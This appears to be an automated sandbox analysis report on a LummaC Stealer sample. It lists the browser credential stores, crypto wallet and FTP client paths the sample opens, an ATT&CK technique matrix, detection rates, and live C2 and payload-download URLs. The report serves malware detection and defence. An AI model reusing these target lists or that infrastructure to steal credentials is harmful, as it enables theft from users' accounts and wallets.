Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2375404477.0000000001327000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2375508681.0000000001333000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2375441101.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TTsfmr1RWm.exe PID: 6844, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: TTsfmr1RWm.exe PID: 6844, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	12 Process Injection	44 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Process Injection	LSASS Memory	851 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	44 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TTsfmr1RWm.exe	53%	Virustotal		Browse
TTsfmr1RWm.exe	55%	ReversingLabs	Win32.Infostealer.Tinba
TTsfmr1RWm.exe	100%	Avira	TR/Crypt.TPM.Gen
TTsfmr1RWm.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
scentniej.buzz	0%	Avira URL Cloud	safe
https://mindhandru.buzz/&	0%	Avira URL Cloud	safe
https://mindhandru.buzz/pi	0%	Avira URL Cloud	safe
https://mindhandru.buzz/4	0%	Avira URL Cloud	safe
https://mindhandru.buzz/DXJ	0%	Avira URL Cloud	safe
https://mindhandru.buzz/api4	0%	Avira URL Cloud	safe
https://mindhandru.buzz:443/api	100%	Avira URL Cloud	malware
hummskitnj.buzz	0%	Avira URL Cloud	safe
mindhandru.buzz	0%	Avira URL Cloud	safe
https://mindhandru.buzz/api	100%	Avira URL Cloud	malware
http://185.215.113.16/off/def.exeeWebKit/537.36	0%	Avira URL Cloud	safe
rebuildeso.buzz	0%	Avira URL Cloud	safe
appliacnesot.buzz	0%	Avira URL Cloud	safe
http://185.215.113.16/off/def.exeedbK~	0%	Avira URL Cloud	safe
https://mindhandru.buzz/	0%	Avira URL Cloud	safe
cashfuzysao.buzz	0%	Avira URL Cloud	safe
screwamusresz.buzz	0%	Avira URL Cloud	safe
https://mindhandru.buzz/j	0%	Avira URL Cloud	safe
https://mindhandru.buzz/pi:	0%	Avira URL Cloud	safe
inherineau.buzz	0%	Avira URL Cloud	safe
https://mindhandru.buzz/apir	0%	Avira URL Cloud	safe
prisonyfork.buzz	0%	Avira URL Cloud	safe
https://mindhandru.buzz/b	0%	Avira URL Cloud	safe
https://mindhandru.buzz/Z	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.google.com	142.250.181.68	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
mindhandru.buzz	104.21.11.101	true	false	high
js.monitor.azure.com	unknown	unknown	false	high
mdec.nelreports.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	true	Avira URL Cloud: safe	unknown
hummskitnj.buzz	true	Avira URL Cloud: safe	unknown
mindhandru.buzz	true	Avira URL Cloud: safe	unknown
https://mindhandru.buzz/api	true	Avira URL Cloud: malware	unknown
rebuildeso.buzz	true	Avira URL Cloud: safe	unknown
appliacnesot.buzz	true	Avira URL Cloud: safe	unknown
screwamusresz.buzz	true	Avira URL Cloud: safe	unknown
cashfuzysao.buzz	true	Avira URL Cloud: safe	unknown
inherineau.buzz	true	Avira URL Cloud: safe	unknown
prisonyfork.buzz	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf	chromecache_108.6.dr	false		high
https://duckduckgo.com/chrome_newtab	TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/4	TTsfmr1RWm.exe, 00000000.00000003.2319666198.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/	chromecache_108.6.dr	false		high
https://www.linkedin.com/cws/share?url=$	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Youssef1313	chromecache_108.6.dr	false		high
https://mindhandru.buzz/pi	TTsfmr1RWm.exe, 00000000.00000003.2294352901.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	TTsfmr1RWm.exe, 00000000.00000003.2369470224.000000000134E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://aka.ms/msignite_docs_banner	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://mindhandru.buzz/DXJ	TTsfmr1RWm.exe, 00000000.00000003.2375441101.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9	chromecache_109.6.dr	false		high
http://polymer.github.io/AUTHORS.txt	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml	chromecache_108.6.dr	false		high
https://mindhandru.buzz/&	TTsfmr1RWm.exe, 00000000.00000003.2563226009.000000000133C000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2416182506.0000000001334000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481910245.0000000001334000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mindhandru.buzz:443/api	TTsfmr1RWm.exe, 00000000.00000003.2416406816.0000000001343000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://mindhandru.buzz/api4	TTsfmr1RWm.exe, 00000000.00000003.2481539128.0000000001326000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://management.azure.com/subscriptions?api-version=2016-06-01	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md	chromecache_108.6.dr	false		high
http://x1.c.lencr.org/0	TTsfmr1RWm.exe, 00000000.00000003.2344504525.0000000005B29000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	TTsfmr1RWm.exe, 00000000.00000003.2344504525.0000000005B29000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pshelpmechoose	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://aka.ms/feedback/report?space=61	chromecache_108.6.dr, chromecache_110.6.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://learn-video.azurefd.net/vod/player	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://twitter.com/intent/tweet?original_referer=$	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://github.com/gewarren	chromecache_108.6.dr	false		high
https://support.mozilla.org/products/firefoxgro.all	TTsfmr1RWm.exe, 00000000.00000003.2345482437.0000000005C12000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/CONTRIBUTORS.txt	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://www.mozilla.or	TTsfmr1RWm.exe, 00000000.00000003.2345383675.0000000005B25000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md	chromecache_108.6.dr	false		high
http://185.215.113.16/off/def.exeeWebKit/537.36	TTsfmr1RWm.exe, 00000000.00000002.2630782603.00000000010FA000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725	chromecache_108.6.dr	false		high
https://client-api.arkoselabs.com/v2/api.js	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Thraka	chromecache_108.6.dr	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	TTsfmr1RWm.exe, 00000000.00000003.2369470224.000000000134E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exeedbK~	TTsfmr1RWm.exe, 00000000.00000002.2633624769.0000000001328000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481754685.0000000001343000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	TTsfmr1RWm.exe, 00000000.00000003.2369470224.000000000134E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://polymer.github.io/PATENTS.txt	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://aka.ms/certhelp	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://mindhandru.buzz/pi:	TTsfmr1RWm.exe, 00000000.00000003.2397844272.0000000001332000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2397781741.0000000001327000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2416182506.0000000001334000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481910245.0000000001334000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mindhandru.buzz/	TTsfmr1RWm.exe, 00000000.00000003.2375508681.0000000001333000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2375441101.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/j	TTsfmr1RWm.exe, 00000000.00000003.2563226009.000000000133C000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2416182506.0000000001334000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481910245.0000000001334000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	TTsfmr1RWm.exe, 00000000.00000003.2344504525.0000000005B29000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mairaw	chromecache_108.6.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	TTsfmr1RWm.exe, 00000000.00000003.2344504525.0000000005B29000.00000004.00000800.00020000.00000000.sdmp	false		high
https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js	chromecache_108.6.dr	false		high
https://schema.org	chromecache_109.6.dr	false		high
http://polymer.github.io/LICENSE.txt	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://www.ecosia.org/newtab/	TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/b	TTsfmr1RWm.exe, 00000000.00000003.2416182506.0000000001334000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	TTsfmr1RWm.exe, 00000000.00000003.2345482437.0000000005C12000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	TTsfmr1RWm.exe, 00000000.00000003.2369470224.000000000134E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/yourcaliforniaprivacychoices	chromecache_108.6.dr	false		high
https://mindhandru.buzz/apir	TTsfmr1RWm.exe, 00000000.00000003.2294352901.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	TTsfmr1RWm.exe, 00000000.00000003.2295253791.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2295143679.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/nschonni	chromecache_108.6.dr	false		high
http://185.215.113.16/	TTsfmr1RWm.exe, 00000000.00000003.2548606886.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2562807391.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/Z	TTsfmr1RWm.exe, 00000000.00000003.2563226009.000000000133C000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2416182506.0000000001334000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481910245.0000000001334000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://github.com/adegeo	chromecache_108.6.dr	false		high
http://crl.micro	TTsfmr1RWm.exe, 00000000.00000003.2417973568.00000000012CC000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2294352901.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481391461.0000000001311000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2375621189.00000000012E9000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2397925602.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2481539128.000000000131D000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2398086687.00000000012E9000.00000004.00000020.00020000.00000000.sdmp, TTsfmr1RWm.exe, 00000000.00000003.2375441101.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	TTsfmr1RWm.exe, 00000000.00000003.2369470224.000000000134E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/jonschlinkert/is-plain-object	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	TTsfmr1RWm.exe, 00000000.00000003.2369470224.000000000134E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	TTsfmr1RWm.exe, 00000000.00000003.2344504525.0000000005B29000.00000004.00000800.00020000.00000000.sdmp	false		high
https://octokit.github.io/rest.js/#throttling	chromecache_87.6.dr, chromecache_109.6.dr	false		high
https://github.com/js-cookie/js-cookie	chromecache_87.6.dr, chromecache_109.6.dr	false		high
